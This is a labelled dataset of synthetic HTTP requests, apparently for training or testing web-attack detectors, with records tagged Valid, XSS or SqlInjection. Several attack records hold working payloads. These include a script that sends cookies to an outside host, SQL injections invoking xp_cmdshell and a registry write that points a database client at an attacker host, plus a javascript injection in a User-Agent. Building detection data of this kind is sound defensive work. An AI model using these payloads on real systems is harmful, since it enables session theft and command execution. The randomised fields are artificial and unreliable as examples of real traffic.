End - Id: 43169
Start - Id: 24398
class: Valid
GET /e0njioetf6t3ibt/nrc5itquxshso1hmzlld/1tTdesroaz6p/gaivz/aLdo9l9ogeb8e/1sttaamhimIbttlMs/7etilih2/tEpRterngeiraotaJzu.php4?aiatoHeeYreel=fs33662bZr&eeaaicn0eael=zg7o0bCXE&seo=dN2cd&akttog=woctcon9execf0d9n HTTP/1.0
Host: www.ahrl.it:98
Connection: ahwtpare
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 49.200.26.129
Cookie: catfI3=09810112;ClODprocessing-instruction9sHrTG=y-W@8vpS3@dA;4GinU=&ahpositionnetcatrsh;hn=646;ntehewomrasa=8661;6qbussvcyy3YaoA=7205308
Cookie2: $Version="260"
Date: Fri, 28 Jan 05 04:59:48 UTC
ETag: W/"pO7cDwR5cUoUQ9BP"
Expect: cNyhm=tkhT
From: e8g1@ha9sec5.ch
If-Modified-Since: Fri, 28 Aug 09 22:43:24 CET
If-Unmodified-Since: Tue, 12 Jul 05 19:44:06 CET
If-Match: *
If-None-Match: "0eFlPaQH6CfH3qzr"
If-Range: Tue, 15 Feb 05 05:02:20 UTC
Max-Forwards: 6
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest qop=coI1
Authorization: Digest realm
Range: 4584-
Referer: http://siGuasi.org/oErz.png
TE: chunked;q=0.3
Trailer: Host
User-Agent: Mozilla/2.4 (X11; U; Open BSD i386 6.9; eg-sy; rv:6.7.3) Gecko/99415817
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1274x3966
Via: ap92lc/2.8 www.ceul.gif
Transfer-Encoding: gzip
Upgrade: bf6/1.0, t7Oteo/2.2, sdo/9.0, olyo2o/7.4, ivryva/4.0
Warning: 469 www.tdcl.js "anew82tiB4Desxdnh" "Thu, 02 Oct 08 03:59:00 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 881526835
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24398
Start - Id: 47433
class: XSS
GET /hatiasdmtuhNd/mK2gcdgAA_t/5FeP.iL9qtu0C/ntAnheerhbo/sSpsk16.xdcmZAoo.jpeg?Sfwe=httpbe&oaieenee=8827102&RK-mYm=%3Cstyle++++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript++++%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.teol.com%2Fcgi-bin%2Fte.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&gbiae=06535290 HTTP/1.0
Host: 231.92.186.10:67
Connection: keep-alive
Accept: image/png, video/quicktime;q=0.0
Accept-Charset: iso-8859-3;q=0.1
Accept-Encoding: *
Accept-Language: a-atd4;q=0.6, sltnn-ea1oTyer, hce-n2sola;q=0.9, dnaCwk-t, Xo-szamoau
Cache-Control: only-if-cached
Client-ip: 150.26.240.194
Cookie: ip6eenaeehpt= le;XB2tVQKvoreplace=errs
Cookie2: $Version="05"
Date: Sat, 21 Mar 09 18:41:31 UTC
ETag: W/"USbOQLZFotY12CP"
Expect: 100-continue
From: 0hOsn@ivHe.ch
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Sun, 25 Nov 07 15:25:55 CET
If-Match: *
If-None-Match: "bKL2lx@h0WK9PGcNzi"
If-Range: Mon, 25 Jan 10 06:50:33 UTC
Max-Forwards: 6633
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: Digest nonce
Range: 13744-31405
Referer: /adno.css
TE: chunked
Trailer: Referer
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 8.9; ha-nJ; rv:7.6.6) Gecko/09928463
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 2.7 www.esineboj.gif, 2.9 193.87.222.72, HTTP/2.0 www.senp.html
Transfer-Encoding: compress
Upgrade: cn0/7.2, eS1l/7.0, wilq/0.5
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47433
Start - Id: 5385
class: Valid
PUT /Aboot.iniYcpEq/ITWJYO/iGp4.bSJZR7UV9wYk/tobncela0/cGx/c-ct-.TPFrMdXu/A0E.Jczb/z.xOXkqVq1T_TrOw6q/zdooesLrcetesal.cfm? HTTP/1.1
Content-Length: 176
Content-Language: s,1bidat,Euw2
Content-Encoding: deflate
Content-Location: http://www.cppha.uk/9flyaLtt/wTnl/oz3csTy/WMtes/ktoh3e.htm
Content-MD5: Nm4zenRDejhqYXk4ZGhidQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Dec 04 10:35:07 CET
Last-Modified: Mon, 12 Jan 04 02:03:20 UTC
Host: www.eRac.biz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-7;q=0.1, x-mac-chinesetrad, utf-7;q=0.6, iso-8859-8-i, iso-2022-jp
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=33
Client-ip: 49.138.242.29
Cookie: ceesis=widyaezrot;me=idi ;he6MCuty=1472;mwDelsrooa=toaatgontoNh
Cookie2: $Version="21"
Date: Wed, 12 May 04 21:13:10 GMT
ETag: "Joimgnr.4XbEladE"
Expect: 100-continue
From: nojeamee@zitf6g.it
If-Modified-Since: Wed, 26 Dec 07 05:44:55 GMT
If-Unmodified-Since: Tue, 13 Jul 04 13:27:06 CET
If-Match: "ePjMm5fjQUQC_QE"
If-None-Match: "G2pgZ6vyWN-Maa-DKf"
If-Range: Thu, 29 Oct 09 21:43:37 UTC
Max-Forwards: 28
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bWNlZUdjOm5nY2k0dGhh
Authorization: fes3 ohat=hztlna
Range: 429-04732,0-0702,6-47430
Referer: http://cinoel.net/aSin/1oqn/trdtsth/esEb.tar
TE: chunked,trailers
Trailer: Expect
User-Agent: nFYZt.fe http://www.eonodein.be
UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 237x186
Via: HTTP/2.1 www.VufI2os.shtml:807
Transfer-Encoding: raqs
Upgrade: ieet/4.5, 8try/8.0, mey/0.5, rf5/8.0, hga/3.0
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

saheEie7a3eyav=k>eejriEIjngphrqhdn&0amBhttpsRvwlz=tlsanaj--et&abohiallNr0p=Pietg&TaUnnh1=7csXyalFqSrv&omrpwnu=nn18afoDeltm&obysne=u6lreplacefrom5w&cala=4411&etcAH9t=ladminNai

End - Id: 5385
Start - Id: 29940
class: Valid
GET /mcoab0AFNLEaxe8em/yd/i0uonlbwetj/aoaapo0om4eTs.jsp?w3S=agAfa HTTP/1.0
Host: 203.174.255.44
Connection: close
Accept: audio/x-wav
Accept-Charset: x-mac-japanese;q=0.7, iso-8859-5;q=0.8
Accept-Encoding: gzip, compress, gzip, compress
Accept-Language: 60e-ds0nha8, a-b6Kba, A0e-fco
Cache-Control: no-store
Client-ip: 244.242.110.52
Cookie: dnwjhlde=tryerIclink;etysou6iDmKs=lotaomye2fan;6t=4jz-LRc;zSjCGUlDUpjL=i22w9
Cookie2: $Version="97"
Date: Mon, 24 Oct 05 23:42:38 UTC
ETag: "nppFvQZJOsbgkujKBs"
Expect: 100-continue
From: 2aa3teeO@agot.com
If-Modified-Since: Mon, 05 Mar 07 19:41:10 GMT
If-Unmodified-Since: Mon, 15 Nov 04 16:04:14 GMT
If-Match: "_Q_r1PrTnB8awAm7k"
If-None-Match: "cM6XijWGpLz-DgMiR"
If-Range: Sun, 19 Jun 05 07:04:52 UTC
Max-Forwards: 72
MIME-Version: 2.3
Pragma: 7ta='mhalag'
Proxy-Authorization: Basic emZvRUU6bWhkY2k=
Authorization: Basic ZWVtdWZBaG46dHR3b2FzeWU=
Range: 2331-89,1998-32535
Referer: http://www.aehs.be/ricabic/Efmaxcul/iBfw.exe
TE: chunked;q=0.1
Trailer: Host
User-Agent: Mozilla/3.0 (compatible; tbtd; Win 9x; jaeojue; tteuOOpe; gb3seHg)
UA-CPU: MIPS
UA-Disp: 5197,782,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 492x731
Via: HTTP/6.4 174.127.126.96
Transfer-Encoding: mrtOat; naviy=eed1d2pt
Upgrade: onb4/4.3, rcs/3.8, osine/7.9
Warning: 565 www.tserelm.js:4 "heglt9Spavaan" "Sat, 12 Dec 09 10:24:54 UTC"
X-Forwarded-For: 43.204.198.183
X-Serial-Number: 89410
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 29940
Start - Id: 8451
class: Valid
GET /tJe/9c.tiff?eBettsloivbe=nvvZu6eo0&ehm1e4ss=5&oa=kUei3fimdasu&ttgohenpsrox=i&dte0=03765&zjXR%uVj=ecb&fr7reAuonzsm=8fClKdS&nYcVandn=nzv HTTP/1.1
Host: www.d6frhnhtda.st:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=04001
Client-ip: 22.227.82.246
Cookie: opiInEonp=r9VeyW;eEguU=8175
Cookie2: $Version="382"
Date: Mon, 10 May 04 15:50:20 UTC
ETag: "Trr9rGLgrZh7gkh"
Expect: 100-continue
From: sHet@bygd.gov
If-Modified-Since: Fri, 22 Jul 05 22:28:16 GMT
If-Unmodified-Since: Mon, 03 Dec 07 03:26:35 UTC
If-Match: "xlTGcpXpzZ8oM5SvjE@5"
If-None-Match: *
If-Range: Fri, 30 Dec 05 16:15:06 CET
Max-Forwards: 246
MIME-Version: 1.4
Pragma: lmdm='cbAn2tt'
Proxy-Authorization: NTLM YWU0aTA0amVlc0FvVHVmbzJubW5uVG9lNnZzbEVtdHRoZXJlYWhzc2k=
Authorization: ruinh0 tesatn=bAf2hbu
Range: -41709
Referer: /3nAmntce/urst/ilofsjg/dwPaanne/4dgcT.swf
TE: trailers
Trailer: From
User-Agent: igoeE/5.4.8.0.5
UA-CPU: Sparc
UA-Disp: 3788,441,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3083x039
Via: 9.0 154.81.116.230, 8.4 www.aythATez.gif
Transfer-Encoding: identity
Upgrade: pds/0.2, 5souN/0.2
Warning: 701 www.efiqn.jpg "h2nh5chdrzlef" "Mon, 14 Feb 05 17:53:20 CET"
X-Forwarded-For: 24.38.239.223
X-Serial-Number: 3858691762
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8451
Start - Id: 41047
class: SqlInjection
GET /duebcamrvmle/08EWvgZ/X509gJ/hhecaein6t/sPEAPcGuPYJ8mDVvZ/yitgkl/Qbx1WzBw.js?lgoi=28&5rl0it=62184&tpeidere=%27%3BEXEC+++master.dbo.xp_cmdshell++++%27cmd.exe HTTP/1.0
Host: www.msnsweia.org
Connection: keep-alive
Accept: text/*, application/zip, application/zip
Accept-Charset: x-mac-chinesesimp;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 44.24.68.129
Cookie: nTg8ilyarhHdc=Mps];PuXwYeLlw=iQg%2c8ovarEoxtermtylikeosystemeyl;UzBaV5=ta;2f=andhaisfo Qform;cnsazo4in=77784503;eHDneTs2ONi=epolzi
Cookie2: $Version="90"
Date: Mon, 11 Aug 08 01:24:11 GMT
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: issottp
From: ZU4adNb@HtspshaDre.fr
If-Modified-Since: Fri, 31 Oct 08 24:22:23 CET
If-Unmodified-Since: Tue, 07 Nov 06 15:30:30 UTC
If-Match: "jSzQHB0T80PLAdbPxQ"
If-None-Match: "TVChpAh0AxyC034l2Y-F"
If-Range: Sun, 11 Mar 07 09:20:44 GMT
Max-Forwards: 09
MIME-Version: 1.5
Pragma: a='ge'
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: usdeqo aankat=dlpyl
Range: 7-04,570-
Referer: /r7hee/obitvt.mspx
TE: trailers,trailers
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 9.7; nR-wi; rv:8.3.6) Gecko/67759786
UA-CPU: PowerPC
UA-Disp: 439,0025,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 381x817
Via: 6.2 197.203.200.111:980
Transfer-Encoding: compress
Upgrade: rqi/9.1, ehxi/6.6, pyu/0.2
Warning: 050 www.r6ioleOa.htm "witutEd" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41047
Start - Id: 30467
class: Valid
GET /vbscriptBCXCw/eY8e7X@m9/Ixmlp32-wposition@Al/aaofcabsg/rWXIFCOY0uoDAF/FXW6V-Thaving@i/t2fPH8Gf61/nDO3G1/iotni/iBKj4/oEde5hsolewrrtaf.htm?roIIdSn=353&jservicesx9d.7binUf@=35706046&AmstSdsah=%28de&ne6fcdoeeIi=oedrbbin&osnd9no6sli=gpem+AIw9xossam%5Dn&aweYudiusemnsd=eRCfs_w&XmQpXfc=nyWUUU&nL.8iTmochat=soibaidvz HTTP/1.1
Host: www.soms.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, gzip
Accept-Language: tD-w;q=0.8
Cache-Control: no-store
Client-ip: 45.28.58.100
Cookie: sVkHjlike=hasuehiugsn;eeb=ml;adrqhiucuhsc=5;lsheMh3oFnA=nf;Fcopy6BCKnZ-qupdate=t3Gy@ZTn8UbM;o500dcYk8=heryuosthT4fe
Cookie2: $Version="2"
Date: Thu, 22 Feb 07 18:40:40 CET
ETag: "qE@lIbZvdVSnWaZ3G4J"
Expect: raohtlln
From: dernapwU@rroaeee.st
If-Modified-Since: Fri, 05 Sep 08 15:49:26 CET
If-Unmodified-Since: Wed, 26 Sep 07 03:57:12 GMT
If-Match: "m@wYqSCbLASeaqH"
If-None-Match: *
If-Range: Sat, 24 Jun 06 07:04:07 CET
Max-Forwards: 2
MIME-Version: 6.7
Pragma: uCiwNasS='ntkiietE'
Proxy-Authorization: Basic cHRvMDA6ZHNhdG5j
Authorization: Digest realm
Range: 91843-5,671-2
Referer: http://IIidal.st/vrrcf/edeaeE/lnunc.tiff
TE: gzip,deflate,trailers
Trailer: Authorization
User-Agent: fnnLucl (aWcpmM; i1TCDYfJv; gGNHzBE_; eOetsW.)
UA-CPU: x86
UA-Disp: 2897,898,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 710x3564
Via: 5.9 www.eiewsem.tiff, HTTP/6.7 www.6sx3im.js:26, FTP/1.6 www.qrsmsyy.css
Transfer-Encoding: deflate
Upgrade: dksM/4.0, egtr/5.6, at1f/2.7, Ruilnr/5.9, epf4h3/8.8
Warning: 388 www.s8atby.tiff:2173 "etZioyh0oe" "Thu, 25 Sep 08 17:57:30 UTC"
X-Forwarded-For: 216.219.0.201
X-Serial-Number: 839589841918771
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30467
Start - Id: 41053
class: SqlInjection
GET /dLhSmaZF/aonbarishpsnm/l9arBttnRah8i3sahe/1xtermcmdG9F2Mfhttps/HntA2amIienhAaettvat/de/AUdYCMH/.DBLKYetcBjxhV/i9SB3/sw/of.jpeg?emyus=exec+xp_regwrite+++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27ncurecda%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.0
Host: 167.94.136.109
Connection: keep-alive
Accept: video/*, image/*;q=0.9, video/mpeg;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.9, identity;q=0.1, compress;q=0.7, gzip, gzip;q=0.9
Accept-Language: *
Cache-Control: max-age=04
Client-ip: 228.4.149.91
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="082"
Date: Sat, 17 Oct 09 12:11:01 UTC
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: anoat
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Fri, 12 Feb 10 19:13:18 CET
If-Unmodified-Since: Tue, 18 Jan 05 09:04:54 UTC
If-Match: "5mqQPy@ILOQhO5Nzde"
If-None-Match: *
If-Range: Sat, 21 Apr 07 21:30:31 CET
Max-Forwards: 566
MIME-Version: 1.5
Pragma: e='wd'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic eXVldFQ6YW1oZ2lhbA==
Range: 7-04,570-
Referer: http://www.Aeihg.com/2an8sreA/rtqavcQW/de2g2ga6.mp3
TE: gzip
User-Agent: Mozilla/8.8 (X11; U; Solaris 7.5; id-bc; rv:5.2.4) Gecko/03905958
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: 8.9 www.enenr.jpeg:86
Transfer-Encoding: identity
Upgrade: asen/7.4, uore9m/4.0, Yhen/4.8
Warning: 428 www.ndOerieL.jpeg:9 "btsgnnnhoeooes5ArHa7" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41053
Start - Id: 30484
class: Valid
GET /ooRucnnducnyot/olvgnX6PciVxYYn_ELwA/ltpetyoi/.2fromKuftpsCaccess_loginclude4@.js? HTTP/1.1
Host: 159.74.169.174
Connection: keep-alive
Accept: audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uEIa-rlg;q=0.9, minI6an-hrVsejg;q=0.4, aslm0-bneata;q=0.9, 8lhnvnxe-xru7iyi, tl-ene;q=0.5
Cache-Control: only-if-cached
Client-ip: 14.178.222.69
Cookie: samIrNBxENMyh=pczzeODX
Cookie2: $Version="618"
Date: Thu, 26 Oct 06 18:26:28 UTC
ETag: W/"vxgxcMBzfTB9wWE"
Expect: hrohisy=emeNs;mSnIm9=h1Ty
From: l8ngh@nEai2iouaS.be
If-Modified-Since: Tue, 17 Aug 04 08:54:01 GMT
If-Unmodified-Since: Wed, 11 May 05 21:47:23 UTC
If-Match: "_lzXwjIjyzzTGXny"
If-None-Match: "VdX.spbZYBYKujcDVXd"
If-Range: Thu, 10 Jun 04 09:43:32 CET
Max-Forwards: 3
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bWVkbDp0N21t
Authorization: Digest opaque="lwhns"
Range: 32-29,033002-861540
Referer: /yewh/efSsdq/isxgetea/oEiPa.swf
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.2 (X11; U; Open BSD i386 5.5; or-qw; rv:9.1.9) Gecko/36427286
UA-CPU: x86
UA-Disp: 264,406,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 710x3564
Via: FTP/0.2 www.tiaoew.html, FTP/8.3 153.41.92.9, nabno/8.4 www.gqp5eI.htm
Transfer-Encoding: compress
Upgrade: tsn/6.7
Warning: 638 71.219.15.61 "hmtn" "Sat, 22 Jan 05 06:21:26 UTC"
X-Forwarded-For: 205.107.245.45
X-Serial-Number: 9887656877315806
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30484
Start - Id: 24068
class: Valid
GET /2h8qyee2euncfu2Iel/nVQyBXiLIOpSU6S6G/s2@/jqs6wnerMnwrdiw6sel/t4TUk1bRPq7q/licefM/Nd4bmqlahmna/VYrvscriptGt0/foeiolaTengrmi/x26eY8CoKA8LD6/unVySTgFs9oQ0.aspx?5cisea8=9nrccxe&amhs=829&i4Wnullkd2idphp=265627&sg9sng=emnlet&rurwle=i9El+tnrwkr1uhome%40lxkl%3C&iomiskd=lFVJ0r5oMMuy&att0eqgtea0=pw9%27eAoenqqeie&pcnmtlehwrarh=957&norusye=oJ9&ecmvk=oke%3E0&ia=1926 HTTP/1.0
Host: www.n3cse6.uk
Connection: cai2
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: I7ted='atscs'
Client-ip: 254.155.173.49
Cookie: nUtBaRrotlcKov=teaftp;whm4no2Llmasosh=qie;h1ytopXe11e=zlMwrc
Cookie2: $Version="33"
Date: Thu, 25 Jan 07 05:48:43 GMT
ETag: "BRSMmzsz3A@@3r3Ky"
Expect: 100-continue
From: f0sra@9ueh6gfjNk.uk
If-Modified-Since: Wed, 24 May 06 19:11:55 CET
If-Unmodified-Since: Sat, 12 Aug 06 07:57:23 UTC
If-Match: "KOd-8jipe4auVGr4Ngo_"
If-None-Match: "I4cwSU2L6-GR_boXI5"
If-Range: Wed, 08 Feb 06 19:19:00 CET
Max-Forwards: 9457
MIME-Version: 8.4
Pragma: 1seLe='t'
Proxy-Authorization: NTLM dWw5ZWJpbTJydHJ0dGZpSm9hdGFzdWtubW5JcU51ZWlidkptVXRkZ3V1Nk9pRQ==
Authorization: Basic cjNpMGxzOm50dXI5ZQ==
Range: 809-174419,-2567
Referer: http://alnnt.biz/parmc4mr.sh
TE: chunked,trailers
Trailer: Accept-Charset
User-Agent: fK_5fmzcMr http://www.t7l8v00.be
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: 8.2 www.3gpf.html:35, 9.2 www.Ensdaoth.htm, aeect/3.8 www.OrogwNt.css
Transfer-Encoding: deflate
Upgrade: mexkvt/9.3, jmu/8.9, itee/9.6, hik0q/1.1, fi3/2.5
Warning: 493 www.eltyLh9i.html:80426 "8ieAg" "Tue, 23 Jan 07 08:40:05 UTC"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 4272941
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24068
Start - Id: 48221
class: XSS
PUT /ho9ooFreniBi9jal/2u/7z/346@7pQ9addPcopy7/nht4xrtsf6eLn/Tuws4eetanlerTsfj.htm? HTTP/1.1
Content-Length: 25
Content-Language: Luti2rs,eil
Content-Encoding: gzip
Content-Location: /ishwlt/2g79en/rsoa/wmliishs/8Yho.jsp
Content-MD5: ZmV4aW84bzRoMHhlYXFvdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Feb 09 15:47:05 CET
Last-Modified: Wed, 09 Apr 08 05:48:56 UTC
Host: www.Ttrelri.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Cookie: rto=rfs|img;ellwindow.open6v3.admine=o0quNX3M
Date: Mon, 02 Nov 09 24:56:45 CET
Expect: 100-continue
If-Modified-Since: Thu, 08 Sep 05 09:16:57 UTC
If-Unmodified-Since: Mon, 11 Feb 08 06:50:53 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 23 Jun 09 21:14:54 GMT
Max-Forwards: 6
Pragma: en=ilbt
Proxy-Authorization: Digest uri=/zrStssi/4nwo/SuHzl.php4
Authorization: Digest opaque="tsiircF"
Referer: http://www.yjsdia.fr/naazsesh/pnzsl.gz
User-Agent: <object classid   =    "    clsid:...    "   codebase    =    "   javascript: [alert   ('oeE');]     " >
UA-CPU: Sparc
UA-Disp: 3623,950,32
UA-Pixels: 9177x704
Via: 5.3 52.196.197.16
Transfer-Encoding: deflate
----: -------------------

Ilyideie=rCS9geIz4&ta8=79

End - Id: 48221
Start - Id: 42565
class: SqlInjection
GET /iBelueae3/SiM2Ih.L/iTUlTHi/mUeiKZW1MHxFa8O/pueMiqdrhbtSpi2/sfc0vX4ns7WJ@4MqAWY6.php4?1rhrG9oeiili=03382&yscg=eaeatm%24etireplacew+o&Fcoiyendrrbs=dio&b1=%27+++++OR++%27gsms%27+++LIKE+%27aze%2525&eltSasEnhya=p%3E&ee4sag3fcsee4u=%5DselHo%2Bopenboot.inietosx+&6Bcosaa0oa=%2B++Issi%3B HTTP/1.1
Host: www.oGtnneT.fr
Connection: sunEil
Accept: audio/*
Accept-Charset: windows-1258;q=0.4
Accept-Encoding: 
Accept-Language: H6Eg-auTeoee;q=0.2, ox-ihjkaR;q=0.2, cxese-8iege
Cache-Control: min-fresh=606
Client-ip: 221.121.37.212
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="57"
Date: Fri, 18 Jun 04 22:11:06 UTC
ETag: "QS3I9eqTyeDZ0vEbin"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Sun, 17 Aug 08 15:50:10 UTC
If-Unmodified-Since: Fri, 20 Jul 07 07:24:16 CET
If-Match: "uutOzg0lku3icQS9L"
If-None-Match: "_KbjtWBMwwQAIu-xBqA"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 815
MIME-Version: 0.5
Pragma: ii='6EaE'
Proxy-Authorization: Basic b2VsbjY6T2hUZ2Vv
Authorization: Basic ZHh5Vjphb01zaw==
Range: -05,8037-,228664-
Referer: /unn2jy/dude.bin
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: lTand/1.9.9
UA-CPU: MIPS
UA-Disp: 1891,2562,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 161x8196
Via: 1.4 www.tia5.png, 3.9 86.206.223.109, 0.3 www.nbhamA.js
Transfer-Encoding: compress
Upgrade: idlsll/7.2
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42565
Start - Id: 22636
class: Valid
GET /4cI1xBZUQBmzwo/5A9kq.aspx?fsr=972&2b=mq&T6riie72tfntgso=8&rsclens5ht=o4rmssrs&ae3pdEec=rSmYhwhr&ynullLLzHscq=0el&n7spltrlooaantf=9845661963&Ta=%3FeIhbredTuraz&Or7e=wUcLlM&uhec3hxYrhrl=sClOQ.Skz&P8VEsnetcatQ=fI%3E%5D&bnay=kv9nv&aSeUevadthTr=wsKb&VpassthruunionhB2YGtmpj1_=trb HTTP/1.1
Host: 197.198.79.221
Connection: elelyn
Accept: */*;q=0.4
Accept-Charset: x-mac-roman;q=0.4, iso-8859-2;q=0.0, iso-8859-3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 68.152.34.49
Cookie: ogyl7remneovm=e;itril~;FiT-ClCDLhbm=092075;K8lod3=ehEabetweennS$@fjdivtelnet;qf7=33074;mea=w=e;inj=elnioobb4nbpg5o
Cookie2: $Version="501"
Date: Fri, 25 Dec 09 06:11:20 CET
ETag: "jot8xJwmgVNxWAsPY-WS"
Expect: konSndn=s2th
From: dsezsSj@hnssHk.cz
If-Modified-Since: Thu, 29 Apr 10 14:36:03 UTC
If-Unmodified-Since: Fri, 23 Feb 07 08:33:31 CET
If-Match: *
If-None-Match: "CRGDAiq0w0ocGjm"
If-Range: Thu, 08 Mar 07 05:00:17 GMT
Max-Forwards: 3
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="3Fcmat"
Authorization: shre dbfrU=9I2No
Range: 93-1710,671040-
Referer: /uioidect/eJit7es/7hbeeel.doc
TE: gzip;q=0.2,deflate
Trailer: From
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 4.1; gS-ba; rv:2.5.2) Gecko/26452211
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 353x5479
Via: 3.4 www.job2.shtml, HTTP/0.1 www.ooltx.png
Transfer-Encoding: identity
Upgrade: bdtoka/5.6, oh6n/9.8, oq9ry/4.2, eic/9.3
Warning: 281 www.inNer.css "4tJ3dtF" "Sun, 01 Nov 09 07:54:39 CET"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 732034
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22636
Start - Id: 30207
class: Valid
GET /Dq@CeM511DK@V/t3tl6so/snesoblilaygsesh9/eaFknzpdr3oci/sttlthaela/anbNOk-oU00xI1/dGwIhgroup byz/g9/sQUOX.asp? HTTP/1.0
Host: 50.209.84.47
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-3;q=0.8, utf-8, x-mac-roman;q=0.5, cp-936
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 6.222.210.29
Cookie: Htyidheen=21202;ulnves3e4eBaenr=0790;ac=e%eI;Ap8uh=878195086
Cookie2: $Version="21"
Date: Thu, 05 Aug 04 12:08:36 CET
ETag: W/"pEVT4gUmHZeSWZfTeULy"
Expect: gCiaud=uaseai;Iittoha
From: wieAim@aawfi.fr
If-Modified-Since: Sun, 08 Jun 08 01:15:39 CET
If-Unmodified-Since: Mon, 28 Mar 05 16:09:59 GMT
If-Match: "9qg2oba_CgH7ocqm"
If-None-Match: *
